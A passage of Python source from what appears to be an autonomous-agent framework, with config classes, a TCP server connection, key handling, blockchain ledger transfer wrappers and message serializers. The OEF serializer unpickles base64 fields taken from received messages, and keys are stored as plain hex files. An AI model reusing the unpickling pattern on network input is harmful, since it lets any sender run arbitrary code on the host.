self.behaviours = CRUDCollection[BehaviourConfig]()
self.tasks = CRUDCollection[TaskConfig]()
self.shared_classes = CRUDCollection[SharedClassConfig]()
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"protocols": self.protocols,
"dependencies": self.dependencies,
"handlers": [{"handler": h.json} for _, h in self.handlers.read_all()],
"behaviours": [{"behaviour": b.json} for _, b in self.behaviours.read_all()],
"tasks": [{"task": t.json} for _, t in self.tasks.read_all()],
"shared_classes": [{"shared_class": s.json} for _, s in self.shared_classes.read_all()],
"description": self.description
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
name = cast(str, obj.get("name"))
authors = cast(str, obj.get("authors"))
version = cast(str, obj.get("version"))
license = cast(str, obj.get("license"))
url = cast(str, obj.get("url"))
protocols = cast(List[str], obj.get("protocols", []))
dependencies = cast(List[str], obj.get("dependencies", []))
description = cast(str, obj.get("description"))
skill_config = SkillConfig(
name=name,
authors=authors,
version=version,
license=license,
url=url,
protocols=protocols,
dependencies=dependencies,
description=description
)
for b in obj.get("behaviours", []): # type: ignore
behaviour_config = BehaviourConfig.from_json(b["behaviour"])
skill_config.behaviours.create(behaviour_config.class_name, behaviour_config)
for t in obj.get("tasks", []): # type: ignore
task_config = TaskConfig.from_json(t["task"])
skill_config.tasks.create(task_config.class_name, task_config)
for h in obj.get("handlers", []): # type: ignore
handler_config = HandlerConfig.from_json(h["handler"])
skill_config.handlers.create(handler_config.class_name, handler_config)
for s in obj.get("shared_classes", []): # type: ignore
shared_class_config = SharedClassConfig.from_json(s["shared_class"])
skill_config.shared_classes.create(shared_class_config.class_name, shared_class_config)
return skill_config
class AgentConfig(Configuration):
"""Class to represent the agent configuration file."""
def __init__(self,
agent_name: str = "",
aea_version: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
registry_path: str = "",
description: str = "",
private_key_paths: Dict[str, str] = None,
ledger_apis: Dict[str, Tuple[str, int]] = None,
logging_config: Optional[Dict] = None):
"""Instantiate the agent configuration object."""
self.agent_name = agent_name
self.aea_version = aea_version
self.authors = authors
self.version = version
self.license = license
self.url = url
self.registry_path = registry_path
self.description = description
self.private_key_paths = CRUDCollection[PrivateKeyPathConfig]()
self.ledger_apis = CRUDCollection[LedgerAPIConfig]()
private_key_paths = private_key_paths if private_key_paths is not None else {}
for ledger, path in private_key_paths.items():
self.private_key_paths.create(ledger, PrivateKeyPathConfig(ledger, path))
ledger_apis = ledger_apis if ledger_apis is not None else {}
for ledger, (addr, port) in ledger_apis.items():
self.ledger_apis.create(ledger, LedgerAPIConfig(ledger, addr, port))
self.logging_config = logging_config if logging_config is not None else {}
self._default_connection = None # type: Optional[str]
self.connections = set() # type: Set[str]
self.protocols = set() # type: Set[str]
self.skills = set() # type: Set[str]
if self.logging_config == {}:
self.logging_config["version"] = 1
self.logging_config["disable_existing_loggers"] = False
@property
def default_connection(self) -> str:
"""Get the default connection."""
assert self._default_connection is not None, "Default connection not set yet."
return self._default_connection
@default_connection.setter
def default_connection(self, connection_name: str):
"""
Set the default connection.
:param connection_name: the name of the default connection.
:return: None
"""
self._default_connection = connection_name
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"agent_name": self.agent_name,
"aea_version": self.aea_version,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"registry_path": self.registry_path,
"description": self.description,
"private_key_paths": [{"private_key_path": p.json} for l, p in self.private_key_paths.read_all()],
"ledger_apis": [{"ledger_api": t.json} for l, t in self.ledger_apis.read_all()],
"logging_config": self.logging_config,
"default_connection": self.default_connection,
"connections": sorted(self.connections),
"protocols": sorted(self.protocols),
"skills": sorted(self.skills)
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
private_key_paths = {}
for p in obj.get("private_key_paths", []): # type: ignore
private_key_path = PrivateKeyPathConfig.from_json(p["private_key_path"])
private_key_paths[private_key_path.ledger] = private_key_path.path
ledger_apis = {}
for l in obj.get("ledger_apis", []): # type: ignore
ledger_api = LedgerAPIConfig.from_json(l["ledger_api"])
ledger_apis[ledger_api.ledger] = (ledger_api.addr, ledger_api.port)
agent_config = AgentConfig(
agent_name=cast(str, obj.get("agent_name")),
aea_version=cast(str, obj.get("aea_version")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
registry_path=cast(str, obj.get("registry_path")),
description=cast(str, obj.get("description")),
logging_config=cast(Dict, obj.get("logging_config", {})),
private_key_paths=cast(Dict, private_key_paths),
ledger_apis=cast(Dict, ledger_apis)
)
agent_config.connections = set(cast(List[str], obj.get("connections")))
agent_config.protocols = set(cast(List[str], obj.get("protocols")))
agent_config.skills = set(cast(List[str], obj.get("skills")))
# set default configuration
default_connection_name = obj.get("default_connection", None)
agent_config.default_connection = default_connection_name
return agent_config
```
#### File: aea/connections/base.py
```python
import logging
from abc import abstractmethod, ABC
from asyncio import AbstractEventLoop
from typing import TYPE_CHECKING, Optional, Set
from aea.configurations.base import ConnectionConfig
if TYPE_CHECKING:
from aea.mail.base import Envelope # pragma: no cover
logger = logging.getLogger(__name__)
class ConnectionStatus(object):
"""The connection status class."""
def __init__(self):
"""Initialize the connection status."""
self.is_connected = False
class Connection(ABC):
"""Abstract definition of a connection."""
def __init__(self, connection_id: str, restricted_to_protocols: Optional[Set[str]] = None):
"""
Initialize the connection.
:param connection_id: the connection identifier.
:param restricted_to_protocols: the set of protocols ids of the only supported protocols for this connection.
"""
self._connection_id = connection_id
self._restricted_to_protocols = self._get_restricted_to_protocols(restricted_to_protocols)
self._loop = None # type: Optional[AbstractEventLoop]
self._connection_status = ConnectionStatus()
def _get_restricted_to_protocols(self, restricted_to_protocols: Optional[Set[str]] = None) -> Set[str]:
if restricted_to_protocols is not None:
return restricted_to_protocols
elif hasattr(type(self), "restricted_to_protocols") and isinstance(getattr(type(self), "restricted_to_protocols"), set):
return getattr(type(self), "restricted_to_protocols")
else:
return set()
@property
def loop(self) -> Optional[AbstractEventLoop]:
"""Get the event loop."""
return self._loop
@loop.setter
def loop(self, loop: AbstractEventLoop) -> None:
"""
Set the event loop.
:param loop: the event loop.
:return: None
"""
assert self._loop is None or not self._loop.is_running(), "Cannot set the loop while it is running."
self._loop = loop
@property
def connection_id(self) -> str:
"""Get the id of the connection."""
return self._connection_id
@property
def restricted_to_protocols(self) -> Set[str]:
"""Get the restricted to protocols.."""
return self._restricted_to_protocols
@property
def connection_status(self) -> ConnectionStatus:
"""Get the connection status."""
return self._connection_status
@abstractmethod
async def connect(self):
"""Set up the connection."""
@abstractmethod
async def disconnect(self):
"""Tear down the connection."""
@abstractmethod
async def send(self, envelope: 'Envelope') -> None:
"""
Send an envelope.
:param envelope: the envelope to send.
:return: None
"""
@abstractmethod
async def receive(self, *args, **kwargs) -> Optional['Envelope']:
"""
Receive an envelope.
:return: the received envelope, or None if an error occurred.
"""
@classmethod
@abstractmethod
def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':
"""
Initialize a connection instance from a configuration.
:param public_key: the public key of the agent.
:param connection_configuration: the connection configuration.
:return: an instance of the concrete connection class.
"""
```
#### File: connections/tcp/tcp_server.py
```python
import asyncio
import logging
from asyncio import StreamReader, StreamWriter, AbstractServer, Future
from typing import Dict, Optional, Tuple, cast
from aea.configurations.base import ConnectionConfig
from aea.connections.base import Connection
from aea.connections.tcp.base import TCPConnection
from aea.mail.base import Envelope
logger = logging.getLogger(__name__)
STUB_DIALOGUE_ID = 0
class TCPServerConnection(TCPConnection):
"""This class implements a TCP server."""
def __init__(self,
public_key: str,
host: str,
port: int,
connection_id: str = "tcp_server",
**kwargs):
"""
Initialize a TCP channel.
:param public_key: public key.
:param host: the socket bind address.
"""
super().__init__(public_key, host, port, connection_id, **kwargs)
self._server = None # type: Optional[AbstractServer]
self.connections = {} # type: Dict[str, Tuple[StreamReader, StreamWriter]]
self._read_tasks_to_public_key = dict() # type: Dict[Future, str]
async def handle(self, reader: StreamReader, writer: StreamWriter) -> None:
"""
Handle new connections.
:param reader: the stream reader.
:param writer: the stream writer.
:return: None
"""
logger.debug("Waiting for client public key...")
public_key_bytes = await self._recv(reader)
if public_key_bytes:
public_key_bytes = cast(bytes, public_key_bytes)
public_key = public_key_bytes.decode("utf-8")
logger.debug("Public key of the client: {}".format(public_key))
self.connections[public_key] = (reader, writer)
read_task = asyncio.ensure_future(self._recv(reader), loop=self._loop)
self._read_tasks_to_public_key[read_task] = public_key
async def receive(self, *args, **kwargs) -> Optional['Envelope']:
"""
Receive an envelope.
:return: the received envelope, or None if an error occurred.
"""
if len(self._read_tasks_to_public_key) == 0:
logger.warning("Tried to read from the TCP server. However, there is no open connection to read from.")
return None
try:
logger.debug("Waiting for incoming messages...")
done, pending = await asyncio.wait(self._read_tasks_to_public_key.keys(), return_when=asyncio.FIRST_COMPLETED) # type: ignore
# take the first
task = next(iter(done))
envelope_bytes = task.result()
if envelope_bytes is None: # pragma: no cover
logger.debug("[{}]: No data received.")
return None
envelope = Envelope.decode(envelope_bytes)
public_key = self._read_tasks_to_public_key.pop(task)
reader = self.connections[public_key][0]
new_task = asyncio.ensure_future(self._recv(reader), loop=self._loop)
self._read_tasks_to_public_key[new_task] = public_key
return envelope
except asyncio.CancelledError:
logger.debug("Receiving loop cancelled.")
return None
except Exception as e:
logger.error("Error in the receiving loop: {}".format(str(e)))
return None
async def setup(self):
"""Set the connection up."""
self._server = await asyncio.start_server(self.handle, host=self.host, port=self.port)
logger.debug("Start listening on {}:{}".format(self.host, self.port))
async def teardown(self):
"""Tear the connection down."""
for pbk, (reader, _) in self.connections.items():
reader.feed_eof()
for t in self._read_tasks_to_public_key:
t.cancel()
self._server.close()
def select_writer_from_envelope(self, envelope: Envelope):
"""Select the destination, given the envelope."""
to = envelope.to
if to not in self.connections:
return None
_, writer = self.connections[to]
return writer
@classmethod
def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':
"""Get the TCP server connection from the connection configuration.
:param public_key: the public key of the agent.
:param connection_configuration: the connection configuration object.
:return: the connection object
"""
address = cast(str, connection_configuration.config.get("address"))
port = cast(int, connection_configuration.config.get("port"))
return TCPServerConnection(public_key, address, port,
connection_id=connection_configuration.name,
restricted_to_protocols=set(connection_configuration.restricted_to_protocols))
```
#### File: aea/context/base.py
```python
from queue import Queue
from typing import Dict
from aea.connections.base import ConnectionStatus
from aea.decision_maker.base import OwnershipState, Preferences, GoalPursuitReadiness
from aea.mail.base import OutBox
from aea.crypto.default import DEFAULT
from aea.crypto.fetchai import FETCHAI
from aea.crypto.ledger_apis import LedgerApis
class AgentContext:
"""Provide read access to relevant data of the agent for the skills."""
def __init__(self, agent_name: str,
public_keys: Dict[str, str],
addresses: Dict[str, str],
ledger_apis: LedgerApis,
connection_status: ConnectionStatus,
outbox: OutBox,
decision_maker_message_queue: Queue,
ownership_state: OwnershipState,
preferences: Preferences,
goal_pursuit_readiness: GoalPursuitReadiness):
"""
Initialize an agent context.
:param agent_name: the agent's name
:param public_keys: the public keys of the agent
:param ledger_apis: the ledger apis
:param connection_status: the connection status
:param outbox: the outbox
:param decision_maker_message_queue: the (in) queue of the decision maker
:param ownership_state: the ownership state of the agent
:param preferences: the preferences of the agent
:param goal_pursuit_readiness: ready to pursuit its goals
"""
self._agent_name = agent_name
self._public_keys = public_keys
self._addresses = addresses
self._ledger_apis = ledger_apis
self._connection_status = connection_status
self._outbox = outbox
self._decision_maker_message_queue = decision_maker_message_queue
self._ownership_state = ownership_state
self._preferences = preferences
self._goal_pursuit_readiness = goal_pursuit_readiness
@property
def agent_name(self) -> str:
"""Get agent name."""
return self._agent_name
@property
def public_keys(self) -> Dict[str, str]:
"""Get public keys."""
return self._public_keys
@property
def addresses(self) -> Dict[str, str]:
"""Get addresses."""
return self._addresses
@property
def address(self) -> str:
"""Get the defualt address."""
return self._addresses[FETCHAI] if FETCHAI in self._addresses.keys() else self._addresses[DEFAULT]
@property
def public_key(self) -> str:
"""Get the default public key."""
return self._public_keys[FETCHAI] if FETCHAI in self._public_keys.keys() else self._public_keys[DEFAULT]
@property
def connection_status(self) -> ConnectionStatus:
"""Get connection status."""
return self._connection_status
@property
def outbox(self) -> OutBox:
"""Get outbox."""
return self._outbox
@property
def decision_maker_message_queue(self) -> Queue:
"""Get decision maker queue."""
return self._decision_maker_message_queue
@property
def ownership_state(self) -> OwnershipState:
"""Get the ownership state of the agent."""
return self._ownership_state
@property
def preferences(self) -> Preferences:
"""Get the preferences of the agent."""
return self._preferences
@property
def goal_pursuit_readiness(self) -> GoalPursuitReadiness:
"""Get the goal pursuit readiness."""
return self._goal_pursuit_readiness
@property
def ledger_apis(self) -> LedgerApis:
"""Get the ledger APIs."""
return self._ledger_apis
```
#### File: aea/crypto/fetchai.py
```python
import logging
from pathlib import Path
from typing import Optional, BinaryIO
from fetchai.ledger.crypto import Entity, Identity, Address # type: ignore
from aea.crypto.base import Crypto
logger = logging.getLogger(__name__)
FETCHAI = "fetchai"
class FetchAICrypto(Crypto):
"""Class wrapping the Entity Generation from Fetch.AI ledger."""
identifier = FETCHAI
def __init__(self, private_key_path: Optional[str] = None):
"""
Instantiate a fetchai crypto object.
:param private_key_path: the private key path of the agent
"""
self._entity = self._generate_private_key() if private_key_path is None else self._load_private_key_from_path(private_key_path)
self._address = str(Address(Identity.from_hex(self.public_key)))
@property
def entity(self) -> Entity:
"""Get the entity."""
return self._entity
@property
def public_key(self) -> str:
"""
Return a public key in hex format.
:return: a public key string in hex format
"""
return self._entity.public_key_hex
@property
def address(self) -> str:
"""
Return the address for the key pair.
:return: a display_address str
"""
return self._address
def _load_private_key_from_path(self, file_name) -> Entity:
"""
Load a private key in hex format from a file.
:param file_name: the path to the hex file.
:return: the Entity.
"""
path = Path(file_name)
try:
if path.is_file():
with open(path, "r") as key:
data = key.read()
entity = Entity.from_hex(data)
else:
entity = self._generate_private_key()
return entity
except IOError as e: # pragma: no cover
logger.exception(str(e))
def _generate_private_key(self) -> Entity:
entity = Entity()
return entity
def sign_transaction(self, message: bytes) -> bytes:
"""
Sing a transaction to send it to the ledger.
:param message:
:return: Signed message in bytes
"""
signature = self._entity.sign(message)
return signature
@classmethod
def get_address_from_public_key(cls, public_key: str) -> Address:
"""
Get the address from the public key.
:param public_key: the public key
:return: str
"""
identity = Identity.from_hex(public_key)
return Address(identity)
@classmethod
def load(cls, fp: BinaryIO):
"""
Deserialize binary file `fp` (a `.read()`-supporting file-like object containing a private key).
:param fp: the input file pointer. Must be set in binary mode (mode='rb')
:return: None
"""
raise NotImplementedError # pragma: no cover
def dump(self, fp: BinaryIO) -> None:
"""
Serialize crypto object as binary stream to `fp` (a `.write()`-supporting file-like object).
:param fp: the output file pointer. Must be set in binary mode (mode='wb')
:return: None
"""
fp.write(self.entity.private_key_hex.encode("utf-8"))
```
#### File: aea/crypto/ledger_apis.py
```python
import logging
import sys
import time
from typing import Any, Dict, Optional, Tuple, cast
import web3
import web3.exceptions
from fetchai.ledger.api import LedgerApi as FetchLedgerApi
# from fetchai.ledger.api.tx import TxStatus
from web3 import Web3, HTTPProvider
from aea.crypto.base import Crypto
from aea.crypto.ethereum import ETHEREUM
from aea.crypto.fetchai import FETCHAI
DEFAULT_FETCHAI_CONFIG = ('alpha.fetch-ai.com', 80)
SUCCESSFUL_TERMINAL_STATES = ('Executed', 'Submitted')
SUPPORTED_LEDGER_APIS = [ETHEREUM, FETCHAI]
logger = logging.getLogger(__name__)
GAS_PRICE = '50'
GAS_ID = 'gwei'
UNKNOWN = "UNKNOWN"
OK = "OK"
ERROR = "ERROR"
class LedgerApis(object):
"""Store all the ledger apis we initialise."""
def __init__(self, ledger_api_configs: Dict[str, Tuple[str, int]]):
"""
Instantiate a wallet object.
:param ledger_api_configs: the ledger api configs
"""
apis = {} # type: Dict[str, Any]
configs = {} # type: Dict[str, Tuple[str, int]]
self._last_tx_statuses = {} # type: Dict[str, str]
for identifier, config in ledger_api_configs.items():
self._last_tx_statuses[identifier] = UNKNOWN
if identifier == FETCHAI:
api = FetchLedgerApi(config[0], config[1])
apis[identifier] = api
configs[identifier] = config
elif identifier == ETHEREUM:
api = Web3(HTTPProvider(config[0]))
apis[identifier] = api
configs[identifier] = config
else:
raise ValueError("Unsupported identifier in ledger apis.")
self._apis = apis
self._configs = configs
@property
def configs(self) -> Dict[str, Tuple[str, int]]:
"""Get the configs."""
return self._configs
@property
def apis(self) -> Dict[str, Any]:
"""Get the apis."""
return self._apis
@property
def has_fetchai(self) -> bool:
"""Check if it has the fetchai API."""
return FETCHAI in self.apis.keys()
@property
def has_ethereum(self) -> bool:
"""Check if it has the ethereum API."""
return ETHEREUM in self.apis.keys()
@property
def last_tx_statuses(self) -> Dict[str, str]:
"""Get the statuses for the last transaction."""
return self._last_tx_statuses
def token_balance(self, identifier: str, address: str) -> int:
"""
Get the token balance.
:param identifier: the identifier of the ledger
:param address: the address to check for
:return: the token balance
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
api = self.apis[identifier]
if identifier == FETCHAI:
try:
balance = api.tokens.balance(address)
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to get the current balance.")
balance = 0
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
balance = api.eth.getBalance(address)
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to get the current balance.")
balance = 0
self._last_tx_statuses[identifier] = ERROR
else: # pragma: no cover
raise Exception("Ledger id is not known")
return balance
def transfer(self, identifier: str, crypto_object: Crypto, destination_address: str, amount: int, tx_fee: int) -> Optional[str]:
"""
Transfer from self to destination.
:param identifier: the crypto code
:param crypto_object: the crypto object that contains the fucntions for signing transactions.
:param destination_address: the address of the receive
:param amount: the amount
:param tx_fee: the tx fee
:return: tx digest if successful, otherwise None
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
api = self.apis[identifier]
logger.info("Waiting for the validation of the transaction ...")
if identifier == FETCHAI:
try:
tx_digest = api.tokens.transfer(crypto_object.entity, destination_address, amount, tx_fee)
api.sync(tx_digest)
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting the transfer.")
tx_digest = None
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
nonce = api.eth.getTransactionCount(api.toChecksumAddress(crypto_object.address))
# TODO : handle misconfiguration
chain_id = self.configs.get(identifier)[1] # type: ignore
transaction = {
'nonce': nonce,
'chainId': chain_id,
'to': destination_address,
'value': amount,
'gas': tx_fee,
'gasPrice': api.toWei(GAS_PRICE, GAS_ID)
}
signed = api.eth.account.signTransaction(transaction, crypto_object.entity.privateKey)
hex_value = api.eth.sendRawTransaction(signed.rawTransaction)
logger.info("TX Hash: {}".format(str(hex_value.hex())))
while True:
try:
api.eth.getTransactionReceipt(hex_value)
logger.info("transaction validated - exiting")
tx_digest = hex_value.hex()
self._last_tx_statuses[identifier] = OK
break
except web3.exceptions.TransactionNotFound: # pragma: no cover
logger.info("transaction not found - sleeping for 3.0 seconds")
self._last_tx_statuses[identifier] = ERROR
time.sleep(3.0)
return tx_digest
except Exception:
logger.warning("An error occurred while attempting the transfer.")
tx_digest = None
self._last_tx_statuses[identifier] = ERROR
else: # pragma: no cover
raise Exception("Ledger id is not known")
return tx_digest
def is_tx_settled(self, identifier: str, tx_digest: str, amount: int) -> bool:
"""
Check whether the transaction is settled and correct.
:param identifier: the identifier of the ledger
:param tx_digest: the transaction digest
:return: True if correctly settled, False otherwise
"""
assert identifier in self.apis.keys(), "Unsupported ledger identifier."
is_successful = False
api = self.apis[identifier]
if identifier == FETCHAI:
try:
logger.info("Checking the transaction ...")
# tx_status = cast(TxStatus, api.tx.status(tx_digest))
tx_status = cast(str, api.tx.status(tx_digest))
# if tx_status.successful:
if tx_status in SUCCESSFUL_TERMINAL_STATES:
# tx_contents = cast(TxContents, api.tx.contents(tx_digest))
# tx_contents.transfers_to()
# TODO: check the amount of the transaction is correct
is_successful = True
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occurred while attempting to check the transaction.")
self._last_tx_statuses[identifier] = ERROR
elif identifier == ETHEREUM:
try:
logger.info("Checking the transaction ...")
tx_status = api.eth.getTransactionReceipt(tx_digest)
if tx_status is not None:
is_successful = True
logger.info("Transaction validated ...")
self._last_tx_statuses[identifier] = OK
except Exception:
logger.warning("An error occured while attempting to check the transaction!")
self._last_tx_statuses[identifier] = ERROR
return is_successful
def _try_to_instantiate_fetchai_ledger_api(addr: str, port: int) -> None:
"""
Tro to instantiate the fetchai ledger api.
:param addr: the address
:param port: the port
"""
try:
from fetchai.ledger.api import LedgerApi
LedgerApi(addr, port)
except Exception:
logger.error("Cannot connect to fetchai ledger with provided config.")
sys.exit(1)
def _try_to_instantiate_ethereum_ledger_api(addr: str, port: int) -> None:
"""
Tro to instantiate the fetchai ledger api.
:param addr: the address
:param port: the port
"""
try:
from web3 import Web3, HTTPProvider
Web3(HTTPProvider(addr))
except Exception:
logger.error("Cannot connect to ethereum ledger with provided config.")
sys.exit(1)
```
#### File: helpers/preference_representations/base.py
```python
import math
from typing import Dict
def logarithmic_utility(utility_params_by_good_pbk: Dict[str, float], quantities_by_good_pbk: Dict[str, int], quantity_shift: int = 1) -> float:
"""
Compute agent's utility given her utility function params and a good bundle.
:param utility_params_by_good_pbk: utility params by good identifier
:param quantities_by_good_pbk: quantities by good identifier
:param quantity_shift: a non-negative factor to shift the quantities in the utility function (to ensure the natural logarithm can be used on the entire range of quantities)
:return: utility value
"""
assert quantity_shift >= 0, "The quantity_shift argument must be a non-negative integer."
goodwise_utility = [utility_params_by_good_pbk[good_pbk] * math.log(quantity + quantity_shift) if quantity + quantity_shift > 0 else -10000
for good_pbk, quantity in quantities_by_good_pbk.items()]
return sum(goodwise_utility)
def linear_utility(exchange_params_by_currency: Dict[str, float], balance_by_currency: Dict[str, int]) -> float:
"""
Compute agent's utility given her utility function params and a good bundle.
:param exchange_params_by_currency: exchange params by currency
:param balance_by_currency: balance by currency
:return: utility value
"""
money_utility = [exchange_params_by_currency[currency] * balance for currency, balance in balance_by_currency.items()]
return sum(money_utility)
```
#### File: protocols/oef/serialization.py
```python
import base64
import copy
import json
import pickle
from aea.protocols.base import Message
from aea.protocols.base import Serializer
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import Description, Query
"""default 'to' field for OEF envelopes."""
DEFAULT_OEF = "oef"
class OEFSerializer(Serializer):
"""Serialization for the OEF protocol."""
def encode(self, msg: Message) -> bytes:
"""
Decode the message.
:param msg: the message object
:return: the bytes
"""
oef_type = OEFMessage.Type(msg.get("type"))
new_body = copy.copy(msg.body)
new_body["type"] = oef_type.value
if oef_type in {OEFMessage.Type.REGISTER_SERVICE, OEFMessage.Type.UNREGISTER_SERVICE}:
service_description = msg.body["service_description"] # type: Description
service_description_bytes = base64.b64encode(pickle.dumps(service_description)).decode("utf-8")
new_body["service_description"] = service_description_bytes
elif oef_type in {OEFMessage.Type.REGISTER_AGENT, OEFMessage.Type.UNREGISTER_AGENT}:
agent_description = msg.body["agent_description"] # type: Description
agent_description_bytes = base64.b64encode(pickle.dumps(agent_description)).decode("utf-8")
new_body["agent_description"] = agent_description_bytes
elif oef_type in {OEFMessage.Type.SEARCH_SERVICES, OEFMessage.Type.SEARCH_AGENTS}:
query = msg.body["query"] # type: Query
query_bytes = base64.b64encode(pickle.dumps(query)).decode("utf-8")
new_body["query"] = query_bytes
elif oef_type in {OEFMessage.Type.SEARCH_RESULT}:
# we need this cast because the "agents" field might contains
# the Protobuf type "RepeatedScalarContainer", which is not JSON serializable.
new_body["agents"] = list(msg.body["agents"])
elif oef_type in {OEFMessage.Type.OEF_ERROR}:
operation = msg.body["operation"]
new_body["operation"] = str(operation)
oef_message_bytes = json.dumps(new_body).encode("utf-8")
return oef_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
json_msg = json.loads(obj.decode("utf-8"))
oef_type = OEFMessage.Type(json_msg["type"])
new_body = copy.copy(json_msg)
new_body["type"] = oef_type
if oef_type in {OEFMessage.Type.REGISTER_SERVICE, OEFMessage.Type.UNREGISTER_SERVICE}:
service_description_bytes = base64.b64decode(json_msg["service_description"])
service_description = pickle.loads(service_description_bytes)
new_body["service_description"] = service_description
elif oef_type in {OEFMessage.Type.REGISTER_AGENT, OEFMessage.Type.UNREGISTER_AGENT}:
agent_description_bytes = base64.b64decode(json_msg["agent_description"])
agent_description = pickle.loads(agent_description_bytes)
new_body["agent_description"] = agent_description
elif oef_type in {OEFMessage.Type.SEARCH_SERVICES, OEFMessage.Type.SEARCH_AGENTS}:
query_bytes = base64.b64decode(json_msg["query"])
query = pickle.loads(query_bytes)
new_body["query"] = query
elif oef_type in {OEFMessage.Type.SEARCH_RESULT}:
new_body["agents"] = list(json_msg["agents"])
elif oef_type in {OEFMessage.Type.OEF_ERROR}:
operation = json_msg["operation"]
new_body["operation"] = OEFMessage.OEFErrorOperation(int(operation))
oef_message = OEFMessage(oef_type=oef_type, body=new_body)
return oef_message
```
#### File: protocols/tac/serialization.py
```python
import sys
from typing import Any, Dict, TYPE_CHECKING
from aea.protocols.base import Message
from aea.protocols.base import Serializer
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.protocols.tac import tac_pb2
from packages.protocols.tac.message import TACMessage
else:
import tac_protocol.tac_pb2 as tac_pb2 # pragma: no cover
from tac_protocol.message import TACMessage # pragma: no cover
def _from_dict_to_pairs(d):
"""Convert a flat dictionary into a list of StrStrPair or StrIntPair."""
result = []
items = sorted(d.items(), key=lambda pair: pair[0])
for key, value in items:
if type(value) == int:
pair = tac_pb2.StrIntPair()
elif type(value) == str:
pair = tac_pb2.StrStrPair()
elif type(value) == float:
pair = tac_pb2.StrFloatPair()
else:
raise ValueError("Either 'int' or 'str' or 'float', not {}".format(type(value)))
pair.first = key
pair.second = value
result.append(pair)
return result
def _from_pairs_to_dict(pairs):
"""Convert a list of StrStrPair or StrIntPair or StrFloatPair into a flat dictionary."""
result = {}
for pair in pairs:
key = pair.first
value = pair.second
result[key] = value
return result
class TACSerializer(Serializer):
"""Serialization for the TAC protocol."""
def encode(self, msg: Message) -> bytes:
"""
Decode the message.
:param msg: the message object
:return: the bytes
"""
tac_type = TACMessage.Type(msg.get("type"))
tac_container = tac_pb2.TACMessage()
if tac_type == TACMessage.Type.REGISTER:
agent_name = msg.get("agent_name")
tac_msg = tac_pb2.TACAgent.Register() # type: ignore
tac_msg.agent_name = agent_name
tac_container.register.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.UNREGISTER:
tac_msg = tac_pb2.TACAgent.Unregister() # type: ignore
tac_container.unregister.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION:
tac_msg = tac_pb2.TACAgent.Transaction() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.counterparty = msg.get("counterparty")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.sender_tx_fee = msg.get("sender_tx_fee")
tac_msg.counterparty_tx_fee = msg.get("counterparty_tx_fee")
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GET_STATE_UPDATE:
tac_msg = tac_pb2.TACAgent.GetStateUpdate() # type: ignore
tac_container.get_state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.CANCELLED:
tac_msg = tac_pb2.TACController.Cancelled() # type: ignore
tac_container.cancelled.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.GAME_DATA:
tac_msg = tac_pb2.TACController.GameData() # type: ignore
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.exchange_params_by_currency.extend(_from_dict_to_pairs(msg.get("exchange_params_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_msg.utility_params_by_good_pbk.extend(_from_dict_to_pairs(msg.get("utility_params_by_good_pbk")))
tac_msg.tx_fee = msg.get("tx_fee")
tac_msg.agent_pbk_to_name.extend(_from_dict_to_pairs(msg.get("agent_pbk_to_name")))
tac_msg.good_pbk_to_name.extend(_from_dict_to_pairs(msg.get("good_pbk_to_name")))
tac_msg.version_id = msg.get("version_id")
tac_container.game_data.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TRANSACTION_CONFIRMATION:
tac_msg = tac_pb2.TACController.TransactionConfirmation() # type: ignore
tac_msg.transaction_id = msg.get("transaction_id")
tac_msg.amount_by_currency.extend(_from_dict_to_pairs(msg.get("amount_by_currency")))
tac_msg.quantities_by_good_pbk.extend(_from_dict_to_pairs(msg.get("quantities_by_good_pbk")))
tac_container.transaction_confirmation.CopyFrom(tac_msg)
# elif tac_type == TACMessage.Type.STATE_UPDATE:
# tac_msg = tac_pb2.TACController.StateUpdate() # type: ignore
# game_data_json = msg.get("game_data")
# game_data = tac_pb2.TACController.GameData() # type: ignore
# game_data.amount_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["amount_by_currency"]))) # type: ignore
# game_data.exchange_params_by_currency.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["exchange_params_by_currency"]))) # type: ignore
# game_data.quantities_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["quantities_by_good_pbk"]))) # type: ignore
